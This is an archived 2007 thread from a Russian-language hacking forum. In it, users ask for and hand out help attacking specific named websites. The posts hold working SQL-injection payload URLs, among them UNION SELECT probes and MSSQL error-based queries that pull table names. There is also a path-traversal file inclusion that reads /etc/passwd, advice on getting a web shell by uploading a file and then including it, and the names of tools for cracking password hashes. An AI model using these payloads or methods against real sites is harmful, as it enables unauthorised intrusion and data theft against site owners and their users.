ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.12.2007, 15:49
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
на сайте есть форма, всё введённое в неё добавляется в базу данных мускул 5 версии.(без фильтрации)
есть скуль иньекция в (index.php?id=999+union+select+1,2,3,4/*) и я могу вывести на экран инфу, что я ввёл в форму (и то что другие ввели тоже, коненчо)
(столбец 3 выводится на экран)
Последний раз редактировалось Girsoft; 12.12.2007 в 15:52..
|
|
|
12.12.2007, 16:13
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
ничего ты не зальешь, у тебя file_priv() отключен
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
12.12.2007, 16:19
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)
И ещё один вопрос:
на сайте есть уязвимость (локальный инклуд)
index.php?menu=../../../../../etc/passwd%00
На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?
ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
|
|
|
|
12.12.2007, 16:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
очень странно, что ты нашел там пароли, пароли эти например от ssh или ftp
99% "расшифровать" их можно с помощью passwordpro или jtr...
но я опять же сомневаюсь, что хеши паролей там есть... про локальный инклюд читай здесь:http://forum.antichat.ru/showpost.php?p=495764&postcount=535
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.12.2007, 17:51
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
как фильтрацию обойти ?
http://fun2fon.ru/index.php?cntsearch='
http://fun2fon.ru/index.php?cntsearch=-1+union+select+1/* что вообще можно сделать?
|
|
|
|
12.12.2007, 20:47
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Girsoft
тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)
И ещё один вопрос:
на сайте есть уязвимость (локальный инклуд)
index.php?menu=../../../../../etc/passwd%00
На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?
ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
Да, толькое если есть файл прив. Иначе никак.
Как таковые, эти пароли не особо нужны. Но, можно методом тыка найти довольно нужные файлы конфигов. Так же, просизвести локал инклуд. Т.е. если на том сайте где ты нашёл этот инклуд, есть загрузка каких либо файлов, то загружаешь этот файл с кодом шелла внутри, и уже инклудишь этот файл. Считай шелл у тебя на руках. Рекомендуется к прочтению (и копипасту:d):
https://forum.antichat.ru/thread49775.html
Хотя может это просто читалка файлов, выгоды от неё конечно меньше, т.к. код не интерпретируется, но и с неё можно получить выгоду.
|
|
|
|
12.12.2007, 21:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
file_priv это не функция, не надо скобки ставить =)
|
|
|
|
12.12.2007, 23:46
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
вот искал рефераты на тему алюминия...
Код:
http://studentport.su/referats/referat.php?id=23968
http://studentport.su/referats/referat.php?id=-1'
http://studentport.su/referats/referat.php?id=-1+order+by+11/*
http://studentport.su/referats/referat.php?id=-1+union+selct+1,2,3,4,5,6,7,8,9,10,11/*
помогите плииз  |
|
|
|
12.12.2007, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
А в чем сложность? это mssql
Код:
http://studentport.su/referats/referat.php?id=1+or+1=@@version
Код:
http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 23:59..
|
|
|
|
13.12.2007, 01:13
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
У меня вопрос, почему при таком запросе ругается ?
Код:
http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('page'))--
Код:
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
